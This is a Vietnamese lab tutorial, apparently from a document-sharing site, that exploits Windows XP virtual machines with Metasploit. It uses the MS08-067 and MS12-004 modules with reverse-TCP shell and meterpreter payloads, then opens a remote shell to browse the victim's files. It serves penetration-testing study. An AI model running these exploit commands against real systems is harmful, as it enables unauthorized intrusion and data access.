Tan cong cac lo hong bao mat
-
Upload
hoang-phi-luc -
Category
Documents
-
view
135 -
download
1
Transcript of Tan cong cac lo hong bao mat
![Page 1: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/1.jpg)
I. Khai thác lỗ hổng trên Windows XP với mã lỗi ms08_067Chuẩn bị 2 máy ảo: Windows XP (nạn nhân) và máy Back Track 5r3 (máy tấn công nạn nhân)
Trên máy Back Track cấu hình địa chỉ IP trong bài lab này cho máy là: 192.168.154.128
Các bước thực hiện:
Kiểm tra mạng giữa XP và máy Back Track 5r3:
Máy Back Track 5r3:
Máy Xp:
Kiểm tra thông mạng:
![Page 2: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/2.jpg)
Trên máy Back track 5r3 ta gõ đường dẫn:
cd /pentest/exploits/framework
Ta tiếp tục gõ lệnh:
./msfcli windows/smb/ms08_067_netapi RHOST=192.168.154.129
LHOST=192.168.154.128 PAYLOAD=windows/shell/reverse_tcp E
![Page 3: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/3.jpg)
Trong đó RHOST là IP máy Xp, LHOST là IP máy Back track 5r3.
Sau đó, ta chờ cho máy Back track 5r3 tấn công Xp
Cuối cùng ta đã tấn công được Xp, ta biết được các thông số của máy Xp
![Page 4: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/4.jpg)
.
II. Khai thác lỗ hổng trên Windows XP với mã lỗi MS12_004Máy Backtrack 5r3 có IP là 192.168.1.2, máy xp có IP là 192.168.1.3
Trên máy Back track vào chương trình terminal và gõ lệnh msfconsole
Tìm mã lỗi bằng công cụ metaploit bằng cách gõ lệnh search ms12_004
![Page 5: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/5.jpg)
Sau khi seach được mã lỗi ta dùng lệnh use và copy mã lỗi đã tìm được.
Dùng lệnh show options để biết thêm các câu lệnh cần thiết.
![Page 6: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/6.jpg)
Dùng lệnh SRVHOST <địa chỉ ip máy backtrack>
Dùng lệnh set PAYLOAD windows/meterpreter/preverse_tcp
Dùng lệnh set LHOST <ip backtrack>
![Page 7: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/7.jpg)
Dùng lệnh exploit để tiến hành khai thác lỗi. Chú ý đường dẫn http://192.168.1.2:8080/nếu máy nạn nhân vào đường dẫn này sẽ bị hack.
Trở lại máy Windows XP. Kiểm tra địa chỉ IP máy XP. Với địa chỉ ip máy XP là 192.168.1.3
Trên máy XP ta vào trình duyệt web và gõ đường dẫnhttp://192.168.1.2:8080/
![Page 8: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/8.jpg)
Trên máy Back Track bắt đầu nhận thấy có sự kết nối đến địa chỉ
Và nhận thấy có địa chỉ kết nối vào. Và tạo phiên kết nối vào nó.
Trên máy back track ta gõ lệnh sessions để kiểm tra.
![Page 9: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/9.jpg)
Dùng lệnh sessions –i 1
Xem trước thông tin XP:
Trên máy backtrack gõ getuid để biết thông tin máy Xp, và tài khoản đang truy cập.
![Page 10: Tan cong cac lo hong bao mat](https://reader033.fdocument.pub/reader033/viewer/2022052905/5587337fd8b42aef648b4605/html5/thumbnails/10.jpg)
Gõ sysinfo để biết thông tin chi tiết máy Xp:
Gõ lệnh shell để vào ổ đĩa máy XP:
Giờ thì ta có thể xem được các file trong ổ đĩa của máy XP.